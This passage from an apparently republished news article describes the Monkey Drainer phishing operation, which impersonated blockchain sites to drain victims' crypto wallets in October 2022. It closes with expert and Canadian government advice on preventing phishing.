To make these fake sites more believable, Monkey Drainer has been known to pose as legitimate blockchain sites including RTFKT and Aptos. After logging in to the fraudulent sites, victims enter sensitive details about their cryptocurrency wallets and sign off on transactions,  allowing Monkey Drainer to access their wallets and their funds.

The most prominent victims in the October 2022 attack were referred to only as 0x02a and 0x626. The pair lost a collective $370,000 via malicious phishing sites operated by Monkey Drainer, with 0x02a losing 12 NFTs worth around $150,000.

0x626 held around $2.2mn in their cryptocurrency wallet at the time, however, some of the transactions pushed by Monkey Drainer were rejected by the network the wallet was held on, as they were marked as suspicious. This meant that the overall actual loss was $220,000 worth of cryptocurrency.

Preventing phishing attacks

Teri Radichel, author of Cybersecurity for Executives in the Age of Cloud and CEO of cyber security training and consultancy company 2nd Sight Lab, says that is clear that attacks leveraging phishing and credentials are not going away.

When building their security strategy and threat defense protocols, Radichel suggests that companies “use a layered security approach to prevent damage if and when attackers compromise credentials”, both to defend against and mitigate these attacks. Additionally, Radichel notes that attackers are moving beyond basic web attacks to more sophisticated forms of attacks by leveraging automation and cloud environments. 


 
Image source: the UK National Cyber Security Center (NCSC)

When considering phishing attacks that target individuals, the Canadian Center for Cyber Security (CCCS) provides the following advice:

  • Verify links before you click them. Hover over the link to see if the info (sender/website address) matches what you expect.
  • Avoid sending sensitive information over email or texts. 
  • Back up information so that you have another copy. 
  • Apply software updates and patches.
  • Filter spam emails (unsolicited junk emails sent in bulk).
  • Block IP addresses, domain names, and file types that you know to be bad 
    Call the sender to verify legitimacy (e.g. if you receive a call from your bank, hang up and call them).
  • Use anti-phishing software that aligns with the Domain-based Message Authentication, Reporting, and Conformance (DMARC) policy 
    Reduce the amount of personal information you post online (e.g. phone numbers and extensions for employees).
  • Establish protocols and procedures for your employees to internally verify suspicious communications. This should include an easy way for staff to report phishing attacks.
  • Use multi-factor authentication on all systems, especially on shared corporate media accounts.

[ad_2]
Source link
1...1,3581,3591,360...1,452Page 1,359 of 1,452